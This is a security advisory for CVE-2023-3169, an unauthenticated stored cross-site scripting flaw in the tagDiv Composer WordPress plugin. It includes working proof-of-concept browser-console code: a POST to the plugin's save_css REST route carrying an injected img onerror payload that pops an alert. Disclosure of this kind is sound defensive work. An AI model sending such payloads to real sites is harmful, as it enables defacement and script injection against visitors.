tagDiv Composer < 4.2 – Unauthenticated Stored XSS | CVE 2023-3169

Description

The plugin, used as a companion by the Newspaper and Newsmag themes from tagDiv, does not have authorisation in a REST route and does not validate as well as escape some parameters when outputting them back, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks.

Note: The issue was partially fixed in 4.1 (still exploitable by Admin+ as only authorisation was added) and fully fixed in 4.2

Proof of Concept

Before 4.1:

1. Visit Newsmag > Plugins and install and activate "tagDiv Composer"
2. Run the following code in the browser console while logged out:

fetch( '/wp-json/tdw/save_css', {
    headers: {
        "Content-Type": "application/x-www-form-urlencoded",
    },
    body: "compiled_css=%3C%2Fstyle%3E%3Cimg%20src%20onerror%3Dalert%28%27XSS%2DChecker%27%29%3E%3Cstyle%3E",
    method: "POST",
} );


In version 4.1, exploitable by Admin:

1. Visit Newsmag > Plugins and install and activate "tagDiv Composer"
2. Log in as an admin, and run the following code in a browser console within WP Admin:

await wp.apiRequest( { path: 'tdw/save_css', type: 'POST', data: { compiled_css: "</style><img src=x onerror=alert('XSS-Checker')><style>" } } );

3. Load a frontend page to see the XSS.